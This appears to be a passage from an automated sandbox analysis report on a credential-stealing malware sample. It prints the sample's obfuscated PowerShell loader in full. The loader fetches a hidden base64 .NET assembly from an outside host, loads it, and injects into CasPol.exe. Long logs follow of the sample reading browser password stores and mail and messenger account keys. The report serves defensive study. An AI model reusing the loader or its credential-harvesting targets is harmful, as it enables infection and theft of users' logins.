q3gxuun4lffdegrlc2f0axzhzg9rq3gpktsnks5yrvbmyunlkchby0hhul05mctby0hhul0xmdcrw2niyvjdotcplftzvhjjbmddw2niyvjdmzyplnjfuexhq2uoj0tonscsw3nuckluz11by0hhul0xmjqplnjfuexhq2uokftjsgfsxtgxk1tjsgfsxty3k1tjsgfsxteymcksw3nuckluz11by0hhul0zoskp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $pshome[21]+$pshome[30]+'x')(('zkaimageurl = qcxht'+'tps://drive.google.com/uc?export=download&id=1aivgjjjv1f6'+'vs4suoybnh-sdvuhbywur qcx;zkawebclient = new-object sy'+'stem.net.webclient;zkaimageb'+'ytes = zkawebclient.downloaddata(zkaimageurl);zkaimagetext = [syst'+'em.text.encoding]::utf8.getstring(zkaimagebytes);zkastartflag = qcx<'+'<base64_start>>qcx;zkaendflag = qcx<<base64_end>>qcx;zkastartindex = zkaimagetext.indexof(zkastartflag);zkaendindex = zkaimagetext.indexof(zkaendflag'+');zkastartindex -ge 0 -an'+'d zkaendindex -gt z'+'kast'+'artindex;zkastartin'+'dex += zkastartflag.length;zkabase64length'+' = zkaendindex - zkastartindex;zkabase64command = zkaimagetext.substrin'+'g(zkastartindex, '+'zkabas'+'e64length);zkabase64reversed = -join (zkabase64command.tochararray() kn5 foreach-object { zk'+'a_ })[-1..-(zkab'+'as'+'e64command.length)];zkacommandbytes = [system.'+'convert]::frombase'+'64string(zkabase64reversed);zkaloadedassembly = [system.reflection.assembly]::load(zkacomma'+'ndbytes);zkavaimethod = [dnlib.io.home].ge'+'tmethod(qcxvaiqcx);zkavaimethod.invoke(zkanull, @(qcxtxt.rrfvggfr/75/64.641.471.701//:ptthqcx, qcxdesativadoqcx, qc'+'xdesativadoqcx, qcxdesativadoqcx, qcxcas'+'polqcx, qcxdesativadoq'+'cx, qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcxdesativadoqcx,qcx1qcx,qcxdesativadoqcx));').replace(([char]90+[char]107+[char]97),[string][char]36).replace('kn5',[string][char]124).replace(([char]81+[char]67+[char]120),[string][char]39))"

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 31_2_0041881C GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,

31_2_0041881C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 41_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,

41_2_004082CD

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 31_2_0041739B GetVersionExW,

31_2_0041739B

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Searches for Windows Mail specific files

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db

Tries to steal Instant Messenger accounts or passwords

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
